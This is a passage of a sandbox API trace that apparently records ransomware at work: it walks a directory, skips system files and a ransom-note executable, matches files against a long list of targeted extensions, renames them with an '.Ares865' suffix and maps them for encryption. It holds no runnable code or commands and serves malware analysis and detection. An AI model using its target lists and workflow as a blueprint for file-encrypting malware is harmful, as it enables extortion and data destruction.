3 [0089.294] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.294] lstrlenW (lpString="wmdb") returned 4 [0089.294] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.294] lstrlenW (lpString="wrk") returned 3 [0089.294] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.294] lstrlenW (lpString="xdb") returned 3 [0089.294] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.294] lstrlenW (lpString="xld") returned 3 [0089.294] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.294] lstrlenW (lpString="xmlff") returned 5 [0089.294] lstrcmpiW (lpString1="y.ico", lpString2="xmlff") returned 1 [0089.294] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.Ares865") returned 111 [0089.294] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.ares865"), dwFlags=0x1) returned 1 [0089.295] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.295] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67156) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.296] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.296] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.296] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.297] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10960, lpName=0x0) returned 0x15c [0089.298] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10960) returned 0x190000 [0089.302] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.303] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.303] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.304] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.304] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.304] CloseHandle (hObject=0x15c) returned 1 [0089.305] CloseHandle (hObject=0x118) returned 1 [0089.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.305] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c34f7b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="aoldtz.exe") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2=".") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="..") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="windows") returned -1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="bootmgr") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="temp") returned -1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="pagefile.sys") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="boot") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="ids.txt") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="ntuser.dat") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="perflogs") returned 1 [0089.305] lstrcmpiW (lpString1="scan_settings.ico", lpString2="MSBuild") returned 1 [0089.305] lstrlenW (lpString="scan_settings.ico") returned 17 [0089.305] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103 [0089.306] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="scan_settings.ico" | out: lpString1="scan_settings.ico") returned="scan_settings.ico" [0089.306] lstrlenW (lpString="scan_settings.ico") returned 17 [0089.306] lstrlenW (lpString="Ares865") returned 7 [0089.306] lstrcmpiW (lpString1="ngs.ico", lpString2="Ares865") returned 1 [0089.306] lstrlenW (lpString=".dll") returned 4 [0089.306] lstrcmpiW (lpString1="scan_settings.ico", lpString2=".dll") returned 1 [0089.306] lstrlenW (lpString=".lnk") returned 4 [0089.306] lstrcmpiW (lpString1="scan_settings.ico", lpString2=".lnk") returned 1 [0089.306] lstrlenW (lpString=".ini") returned 4 [0089.306] lstrcmpiW (lpString1="scan_settings.ico", lpString2=".ini") returned 1 [0089.306] lstrlenW (lpString=".sys") returned 4 [0089.306] lstrcmpiW (lpString1="scan_settings.ico", lpString2=".sys") returned 1 [0089.306] lstrlenW (lpString="scan_settings.ico") returned 17 [0089.306] lstrlenW (lpString="bak") returned 3 [0089.306] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.306] lstrlenW (lpString="ba_") returned 3 [0089.306] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.306] lstrlenW (lpString="dbb") returned 3 [0089.306] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.306] lstrlenW (lpString="vmdk") returned 4 [0089.306] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.306] lstrlenW (lpString="rar") returned 3 [0089.306] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.306] lstrlenW (lpString="zip") returned 3 [0089.306] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.306] lstrlenW (lpString="tgz") returned 3 [0089.306] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.306] lstrlenW (lpString="vbox") returned 4 [0089.306] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.306] lstrlenW (lpString="vdi") returned 3 [0089.306] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.306] lstrlenW (lpString="vhd") returned 3 [0089.306] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.306] lstrlenW (lpString="vhdx") returned 4 [0089.306] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.306] lstrlenW (lpString="avhd") returned 4 [0089.306] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.306] lstrlenW (lpString="db") returned 2 [0089.307] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.307] lstrlenW (lpString="db2") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.307] lstrlenW (lpString="db3") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.307] lstrlenW (lpString="dbf") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.307] lstrlenW (lpString="mdf") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.307] lstrlenW (lpString="mdb") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.307] lstrlenW (lpString="sql") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.307] lstrlenW (lpString="sqlite") returned 6 [0089.307] lstrcmpiW (lpString1="gs.ico", lpString2="sqlite") returned -1 [0089.307] lstrlenW (lpString="sqlite3") returned 7 [0089.307] lstrcmpiW (lpString1="ngs.ico", lpString2="sqlite3") returned -1 [0089.307] lstrlenW (lpString="sqlitedb") returned 8 [0089.307] lstrcmpiW (lpString1="ings.ico", lpString2="sqlitedb") returned -1 [0089.307] lstrlenW (lpString="xml") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.307] lstrlenW (lpString="$er") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.307] lstrlenW (lpString="4dd") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.307] lstrlenW (lpString="4dl") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.307] lstrlenW (lpString="^^^") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.307] lstrlenW (lpString="abs") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.307] lstrlenW (lpString="abx") returned 3 [0089.307] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.307] lstrlenW (lpString="accdb") returned 5 [0089.307] lstrcmpiW (lpString1="s.ico", lpString2="accdb") returned 1 [0089.307] lstrlenW (lpString="accdc") returned 5 [0089.307] lstrcmpiW (lpString1="s.ico", lpString2="accdc") returned 1 [0089.307] lstrlenW (lpString="accde") returned 5 [0089.307] lstrcmpiW (lpString1="s.ico", lpString2="accde") returned 1 [0089.308] lstrlenW (lpString="accdr") returned 5 [0089.308] lstrcmpiW (lpString1="s.ico", lpString2="accdr") returned 1 [0089.308] lstrlenW (lpString="accdt") returned 5 [0089.308] lstrcmpiW (lpString1="s.ico", lpString2="accdt") returned 1 [0089.308] lstrlenW (lpString="accdw") returned 5 [0089.308] lstrcmpiW (lpString1="s.ico", lpString2="accdw") returned 1 [0089.308] lstrlenW (lpString="accft") returned 5 [0089.308] lstrcmpiW (lpString1="s.ico", lpString2="accft") returned 1 [0089.308] lstrlenW (lpString="adb") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.308] lstrlenW (lpString="adb") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.308] lstrlenW (lpString="ade") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.308] lstrlenW (lpString="adf") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.308] lstrlenW (lpString="adn") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.308] lstrlenW (lpString="adp") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.308] lstrlenW (lpString="alf") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.308] lstrlenW (lpString="ask") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.308] lstrlenW (lpString="btr") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.308] lstrlenW (lpString="cat") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.308] lstrlenW (lpString="cdb") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.308] lstrlenW (lpString="ckp") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.308] lstrlenW (lpString="cma") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.308] lstrlenW (lpString="cpd") returned 3 [0089.308] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.308] lstrlenW (lpString="dacpac") returned 6 [0089.308] lstrcmpiW (lpString1="gs.ico", lpString2="dacpac") returned 1 [0089.309] lstrlenW (lpString="dad") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.309] lstrlenW (lpString="dadiagrams") returned 10 [0089.309] lstrcmpiW (lpString1="ttings.ico", lpString2="dadiagrams") returned 1 [0089.309] lstrlenW (lpString="daschema") returned 8 [0089.309] lstrcmpiW (lpString1="ings.ico", lpString2="daschema") returned 1 [0089.309] lstrlenW (lpString="db-journal") returned 10 [0089.309] lstrcmpiW (lpString1="ttings.ico", lpString2="db-journal") returned 1 [0089.309] lstrlenW (lpString="db-shm") returned 6 [0089.309] lstrcmpiW (lpString1="gs.ico", lpString2="db-shm") returned 1 [0089.309] lstrlenW (lpString="db-wal") returned 6 [0089.309] lstrcmpiW (lpString1="gs.ico", lpString2="db-wal") returned 1 [0089.309] lstrlenW (lpString="dbc") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.309] lstrlenW (lpString="dbs") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.309] lstrlenW (lpString="dbt") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.309] lstrlenW (lpString="dbv") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.309] lstrlenW (lpString="dbx") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.309] lstrlenW (lpString="dcb") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.309] lstrlenW (lpString="dct") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.309] lstrlenW (lpString="dcx") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.309] lstrlenW (lpString="ddl") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.309] lstrlenW (lpString="dlis") returned 4 [0089.309] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.309] lstrlenW (lpString="dp1") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.309] lstrlenW (lpString="dqy") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.309] lstrlenW (lpString="dsk") returned 3 [0089.309] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.310] lstrlenW (lpString="dsn") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.310] lstrlenW (lpString="dtsx") returned 4 [0089.310] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.310] lstrlenW (lpString="dxl") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.310] lstrlenW (lpString="eco") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.310] lstrlenW (lpString="ecx") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.310] lstrlenW (lpString="edb") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.310] lstrlenW (lpString="epim") returned 4 [0089.310] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.310] lstrlenW (lpString="fcd") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.310] lstrlenW (lpString="fdb") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.310] lstrlenW (lpString="fic") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.310] lstrlenW (lpString="flexolibrary") returned 12 [0089.310] lstrcmpiW (lpString1="settings.ico", lpString2="flexolibrary") returned 1 [0089.310] lstrlenW (lpString="fm5") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.310] lstrlenW (lpString="fmp") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.310] lstrlenW (lpString="fmp12") returned 5 [0089.310] lstrcmpiW (lpString1="s.ico", lpString2="fmp12") returned 1 [0089.310] lstrlenW (lpString="fmpsl") returned 5 [0089.310] lstrcmpiW (lpString1="s.ico", lpString2="fmpsl") returned 1 [0089.310] lstrlenW (lpString="fol") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.310] lstrlenW (lpString="fp3") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.310] lstrlenW (lpString="fp4") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.310] lstrlenW (lpString="fp5") returned 3 [0089.310] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.311] lstrlenW (lpString="fp7") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.311] lstrlenW (lpString="fpt") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.311] lstrlenW (lpString="frm") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.311] lstrlenW (lpString="gdb") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.311] lstrlenW (lpString="gdb") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.311] lstrlenW (lpString="grdb") returned 4 [0089.311] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.311] lstrlenW (lpString="gwi") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.311] lstrlenW (lpString="hdb") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.311] lstrlenW (lpString="his") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.311] lstrlenW (lpString="ib") returned 2 [0089.311] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.311] lstrlenW (lpString="idb") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.311] lstrlenW (lpString="ihx") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.311] lstrlenW (lpString="itdb") returned 4 [0089.311] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.311] lstrlenW (lpString="itw") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.311] lstrlenW (lpString="jet") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.311] lstrlenW (lpString="jtx") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.311] lstrlenW (lpString="kdb") returned 3 [0089.311] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.311] lstrlenW (lpString="kexi") returned 4 [0089.311] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.311] lstrlenW (lpString="kexic") returned 5 [0089.311] lstrcmpiW (lpString1="s.ico", lpString2="kexic") returned 1 [0089.311] lstrlenW (lpString="kexis") returned 5 [0089.312] lstrcmpiW (lpString1="s.ico", lpString2="kexis") returned 1 [0089.312] lstrlenW (lpString="lgc") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.312] lstrlenW (lpString="lwx") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.312] lstrlenW (lpString="maf") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.312] lstrlenW (lpString="maq") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.312] lstrlenW (lpString="mar") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.312] lstrlenW (lpString="marshal") returned 7 [0089.312] lstrcmpiW (lpString1="ngs.ico", lpString2="marshal") returned 1 [0089.312] lstrlenW (lpString="mas") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.312] lstrlenW (lpString="mav") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.312] lstrlenW (lpString="maw") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.312] lstrlenW (lpString="mdbhtml") returned 7 [0089.312] lstrcmpiW (lpString1="ngs.ico", lpString2="mdbhtml") returned 1 [0089.312] lstrlenW (lpString="mdn") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.312] lstrlenW (lpString="mdt") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.312] lstrlenW (lpString="mfd") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.312] lstrlenW (lpString="mpd") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.312] lstrlenW (lpString="mrg") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.312] lstrlenW (lpString="mud") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.312] lstrlenW (lpString="mwb") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.312] lstrlenW (lpString="myd") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.312] lstrlenW (lpString="ndf") returned 3 [0089.312] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.313] lstrlenW (lpString="nnt") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.313] lstrlenW (lpString="nrmlib") returned 6 [0089.313] lstrcmpiW (lpString1="gs.ico", lpString2="nrmlib") returned -1 [0089.313] lstrlenW (lpString="ns2") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.313] lstrlenW (lpString="ns3") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.313] lstrlenW (lpString="ns4") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.313] lstrlenW (lpString="nsf") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.313] lstrlenW (lpString="nv") returned 2 [0089.313] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.313] lstrlenW (lpString="nv2") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.313] lstrlenW (lpString="nwdb") returned 4 [0089.313] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.313] lstrlenW (lpString="nyf") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.313] lstrlenW (lpString="odb") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.313] lstrlenW (lpString="odb") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.313] lstrlenW (lpString="oqy") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.313] lstrlenW (lpString="ora") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.313] lstrlenW (lpString="orx") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.313] lstrlenW (lpString="owc") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.313] lstrlenW (lpString="p96") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.313] lstrlenW (lpString="p97") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.313] lstrlenW (lpString="pan") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.313] lstrlenW (lpString="pdb") returned 3 [0089.313] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.314] lstrlenW (lpString="pdm") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.314] lstrlenW (lpString="pnz") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.314] lstrlenW (lpString="qry") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.314] lstrlenW (lpString="qvd") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.314] lstrlenW (lpString="rbf") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.314] lstrlenW (lpString="rctd") returned 4 [0089.314] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.314] lstrlenW (lpString="rod") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.314] lstrlenW (lpString="rodx") returned 4 [0089.314] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.314] lstrlenW (lpString="rpd") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.314] lstrlenW (lpString="rsd") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.314] lstrlenW (lpString="sas7bdat") returned 8 [0089.314] lstrcmpiW (lpString1="ings.ico", lpString2="sas7bdat") returned -1 [0089.314] lstrlenW (lpString="sbf") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.314] lstrlenW (lpString="scx") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.314] lstrlenW (lpString="sdb") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.314] lstrlenW (lpString="sdc") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.314] lstrlenW (lpString="sdf") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.314] lstrlenW (lpString="sis") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.314] lstrlenW (lpString="spq") returned 3 [0089.314] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.314] lstrlenW (lpString="te") returned 2 [0089.314] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.314] lstrlenW (lpString="teacher") returned 7 [0089.315] lstrcmpiW (lpString1="ngs.ico", lpString2="teacher") returned -1 